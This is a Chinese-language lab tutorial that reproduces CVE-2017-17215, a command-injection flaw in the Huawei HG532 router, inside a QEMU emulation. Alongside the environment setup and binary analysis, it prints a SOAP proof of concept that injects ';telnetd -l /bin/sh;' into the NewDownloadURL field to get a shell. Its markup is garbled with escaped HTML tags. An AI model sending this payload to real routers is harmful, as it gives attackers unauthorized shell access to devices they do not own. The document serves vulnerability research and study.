华为HG532路由器RCE漏洞(CVE-2017-17215)复现教程<\/h1>

漏洞概述<\/h2>
CVE-2017-17215是CheckPoint团队披露的华为HG532路由器远程命令执行(RCE)漏洞，存在于设备的UPnP(Universal Plug and Play)服务中。具体漏洞位于DeviceUpgrade SOAP接口，由于对`NewDownloadURL<\/code>参数处理不当，攻击者可通过精心构造的请求注入任意命令。<\/p>`

复现环境准备<\/h2>
系统要求<\/h3>

Ubuntu 20.04 TLS (推荐)或Ubuntu 22.04<\/li>
注意：不同Ubuntu版本可能遇到不同问题<\/li>
<\/ul>
工具安装<\/h3>


QEMU<\/strong> (用于模拟MIPS环境):<\/p>
sudo apt-get install qemu qemu-system qemu-user-static
<\/code><\/pre>
<\/li>

固件分析工具<\/strong>:<\/p>
sudo apt-get install binwalk
<\/code><\/pre>
<\/li>

SquashFS解压工具<\/strong>:<\/p>
git clone https:\/\/github.com\/devttys0\/sasquatch
cd sasquatch
sudo .\/build.sh
<\/code><\/pre>
<\/li>

网络工具<\/strong>:<\/p>
sudo apt-get install bridge-utils uml-utilities
sudo sysctl -w net.ipv4.ip_forward=1
<\/code><\/pre>
<\/li>
<\/ol>
网络配置<\/h2>


编辑网络接口配置文件\/etc\/network\/interfaces<\/code>，根据实际情况修改接口名称(可能是ens33或eth0):<\/p>
auto br0
iface br0 inet dhcp
    bridge_ports ens33
    bridge_stp off
    bridge_maxwait 0
<\/code><\/pre>
<\/li>

重启网络服务:<\/p>
sudo service networking restart
<\/code><\/pre>
<\/li>
<\/ol>
固件提取与分析<\/h2>


使用binwalk递归扫描提取固件:<\/p>
binwalk -Me HG532固件文件
<\/code><\/pre>
<\/li>

如果遇到"capstone没有ARM64属性"错误:<\/p>

修改相关py文件，将ARM64替换为ARM<\/li>
在Ubuntu 20.04上通常不会报错，22.04可能遇到此问题<\/li>
<\/ul>
<\/li>

如果提取的文件系统为空，使用sasquatch重新解压<\/p>
<\/li>
<\/ol>
QEMU仿真环境搭建<\/h2>


下载MIPS仿真所需文件:<\/p>
wget https:\/\/people.debian.org\/~aurel32\/qemu\/mips\/vmlinux-2.6.32-5-4kc-malta
wget https:\/\/people.debian.org\/~aurel32\/qemu\/mips\/debian_squeeze_mips_standard.qcow2
<\/code><\/pre>
<\/li>

创建启动脚本start.sh<\/code>:<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=\/dev\/sda1 console=tty0"<\/span> -net nic -net tap,ifname=<\/span>tap0,script=<\/span>no,downscript=<\/span>no -nographic
<\/span><\/span><\/code><\/pre><\/li>

给脚本执行权限并运行:<\/p>
chmod +x start.sh
.\/start.sh
<\/code><\/pre>
<\/li>

登录QEMU虚拟机(默认用户名密码均为root)<\/p>
<\/li>
<\/ol>
漏洞分析<\/h2>


漏洞文件位于\/bin\/upnp<\/code>，是32位MIPS大端序程序，无任何保护机制<\/p>
<\/li>

使用IDA分析upnp<\/code>二进制文件:<\/p>

搜索字符串NewDownloadURL<\/code>和NewStatusURL<\/code><\/li>
创建函数进行反编译分析<\/li>
<\/ul>
<\/li>

漏洞原理:<\/p>

程序对输入标签直接使用system<\/code>命令执行<\/li>
可通过;{cmd};<\/code>格式进行命令拼接实现RCE<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现步骤<\/h2>


将提取的文件系统根目录替换原始镜像的根目录<\/p>
<\/li>

查找UPnP服务端口:<\/p>
grep -r '37215' \/bin\/mic
<\/code><\/pre>
<\/li>

启动UPnP服务:<\/p>
\/bin\/mic
<\/code><\/pre>
<\/li>

验证端口是否开放:<\/p>
nc -vv 192.168.102.143 37215
<\/code><\/pre>
<\/li>

构造并发送PoC利用代码:<\/p>
<?xml version="1.0"?><\/span>
<\/span><\/span><SOAP-ENV:Envelope<\/span> xmlns:SOAP-ENV=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span> SOAP-ENV:encodingStyle=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/"<\/span>><\/span>
<\/span><\/span>  <SOAP-ENV:Body><\/span>
<\/span><\/span>    <u:Upgrade<\/span> xmlns:u=<\/span>"urn:schemas-upnp-org:service:WANPPPConnection:1"<\/span>><\/span>
<\/span><\/span>      <NewDownloadURL><\/span>;telnetd -l \/bin\/sh;<\/NewDownloadURL><\/span>
<\/span><\/span>      <NewStatusURL><\/span>;<\/NewStatusURL><\/span>
<\/span><\/span>      <NewUsername><\/span>;<\/NewUsername><\/span>
<\/span><\/span>    <\/u:Upgrade><\/span>
<\/span><\/span>  <\/SOAP-ENV:Body><\/span>
<\/span><\/span><\/SOAP-ENV:Envelope><\/span>
<\/span><\/span><\/code><\/pre><\/li>

成功执行后，可通过telnet连接路由器获取shell<\/p>
<\/li>
<\/ol>
参考链接<\/h2>

漏洞披露: CheckPoint研究报告<\/a><\/li>
QEMU镜像下载: Debian MIPS镜像<\/a><\/li>
<\/ul>

华为HG532路由器RCE漏洞(CVE-2017-17215)复现教程<\/h1>

参考链接<\/h2> 漏洞披露: CheckPoint研究报告<\/a><\/li> QEMU镜像下载: Debian MIPS镜像<\/a><\/li> <\/ul>

参考链接<\/h2>

漏洞披露: CheckPoint研究报告<\/a><\/li>
QEMU镜像下载: Debian MIPS镜像<\/a><\/li> <\/ul>